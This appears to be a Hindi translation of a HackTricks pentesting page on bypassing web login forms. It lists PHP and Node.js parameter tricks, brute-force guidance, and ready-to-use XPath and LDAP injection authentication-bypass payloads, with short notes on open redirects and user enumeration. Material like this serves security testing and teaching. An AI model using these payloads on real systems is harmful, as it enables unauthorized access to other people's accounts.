Login Bypass

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

RootedCON स्पेन में सबसे महत्वपूर्ण साइबर सुरक्षा घटना है और यूरोप में सबसे महत्वपूर्ण में से एक है। तकनीकी ज्ञान को बढ़ावा देने के मिशन के साथ, यह कांग्रेस प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए एक उत्तेजक मिलन स्थल है।

नियमित लॉगिन बायपास

यदि आप एक लॉगिन पेज पाते हैं, तो यहाँ आप कुछ तकनीकें पा सकते हैं जिन्हें बायपास करने की कोशिश कर सकते हैं:

  • पृष्ठ के अंदर टिप्पणियाँ की जाँच करें (नीचे और दाएं ओर स्क्रॉल करें?)

  • देखें कि क्या आप प्रतिबंधित पेजों तक सीधे पहुंच सकते हैं

  • पैरामीटर्स न भेजें (कोई भेजें नहीं या केवल 1 भेजें)

  • PHP तुलना त्रुटि जांचें: user[]=a&pwd=b , user=a&pwd[]=b , user[]=a&pwd[]=b

  • कंटेंट प्रकार को json में बदलें और json मान (bool true समाहित) भेजें

  • यदि आपको एक प्रतिक्रिया मिलती है जो कहती है कि POST समर्थित नहीं है, तो आप Content-Type: application/json के साथ GET अनुरोध के साथ शरीर में JSON भेजने की कोशिश कर सकते हैं

  • नोडजेएस की संभावित पार्सिंग त्रुटि की जांच करें (यह पढ़ें यह): password[password]=1

  • नोडजेएस उस payload को एक क्वेरी में बदल देगा जो निम्नलिखित के समान होगी: SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` ``password=password=1; जिससे पासवर्ड बिट हमेशा सच हो जाएगा।

  • यदि आप एक JSON ऑब्जेक्ट भेज सकते हैं तो आप लॉगिन को बायपास करने के लिए "password":{"password": 1} भेज सकते हैं।

  • ध्यान रखें कि इस लॉगिन को बायपास करने के लिए आपको अब भी एक मान्य उपयोगकर्ता का पता करना और भेजना आवश्यक है

  • mysql.createConnection को बुलाते समय "stringifyObjects":true विकल्प जोड़ना आखिरकार सभी अप्रत्याशित व्यवहारों को ब्लॉक कर देगा जब Object पैरामीटर में पास किया जाएगा।

  • क्रेडेंशियल्स की जांच करें:

  • उपयोग की गई प्रौद्योगिकी/प्लेटफ़ॉर्म के डिफ़ॉल्ट क्रेडेंशियल्स

  • सामान्य कॉम्बिनेशन (रूट, एडमिन, पासवर्ड, तकनीक का नाम, इनमें से किसी एक के साथ डिफ़ॉल्ट उपयोगकर्ता).

  • Cewl का उपयोग करके एक शब्दकोश बनाएं, डिफ़ॉल्ट उपयोगकर्ता नाम और पासवर्ड जोड़ें (यदि है) और सभी शब्दों का उपयोग करके उन्हें उपयोगकर्ता नाम और पासवर्ड के रूप में ब्रूट-फ़ोर्स करने की कोशिश करें

  • बड़े शब्दकोश का उपयोग करके ब्रूट-फ़ोर्स करें (ब्रूट फोर्स)

SQL Injection प्रमाणीकरण बायपास

यहाँ आप SQL इंजेक्शन के माध्यम से लॉगिन को बायपास करने के कई तरीके पा सकते हैं

निम्नलिखित पृष्ठ पर आप एक कस्टम सूची पा सकते हैं जिसे आप लॉगिन को बायपास करने के लिए SQL इंजेक्शन के माध्यम से प्रयास कर सकते हैं:

pageLogin bypass List

No SQL Injection प्रमाणीकरण बायपास

यहाँ आप No SQL इंजेक्शन के माध्यम से लॉगिन को बायपास करने के कई तरीके पा सकते हैं

क्योंकि NoSQL इंजेक्शन को पैरामीटर्स मान को बदलने की आवश्यकता होती है, आपको उन्हें मैन्युअल रूप से टेस्ट करने की आवश्यकता होगी।

XPath Injection प्रमाणीकरण बायपास

यहाँ आप XPath इंजेक्शन के माध्यम से लॉगिन को बायपास करने के कई तरीके पा सकते हैं

' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2

LDAP Injection प्रमाणीकरण बायपास

यहाँ आप कई तरह के ट्रिक्स पा सकते हैं जिनका उपयोग करके LDAP Injection के माध्यम से लॉगिन को बायपास किया जा सकता है।

*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|

याद रखें मुझे

अगर पेज में "याद रखें मुझे" कार्यक्षमता है तो जांचें कि यह कैसे लागू किया गया है और क्या आप इसका दुरुपयोग करके अन्य खातों को अधिकार में ले सकते हैं

रीडायरेक्ट

पेज आम तौर पर लॉगिन के बाद उपयोगकर्ताओं को रीडायरेक्ट करते हैं, जांचें कि क्या आप उस रीडायरेक्ट को बदल सकते हैं ताकि आप ओपन रीडायरेक्ट का कारण बना सकें। शायद आप कुछ जानकारी (कोड, कुकीज़...) चुरा सकते हैं अगर आप उपयोगकर्ता को अपनी वेबसाइट पर रीडायरेक्ट करते हैं।

अन्य जांच

  • जांचें कि क्या आप लॉगिन कार्यक्षमता का दुरुपयोग करके उपयोगकर्ता नामों की गणना कर सकते हैं।

  • जांचें कि क्या ऑटो-पूर्ण पासवर्ड/संवेदनशील जानकारी फॉर्म में सक्रिय है इनपुट: <input autocomplete="false"

​​RootedCON स्पेन में सबसे महत्वपूर्ण साइबर सुरक्षा घटना है और यूरोप में सबसे महत्वपूर्ण में से एक है। तकनीकी ज्ञान को बढ़ावा देने के मिशन के साथ, यह कांग्रेस प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए एक उफान मिलने का स्थान है।

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

Last updated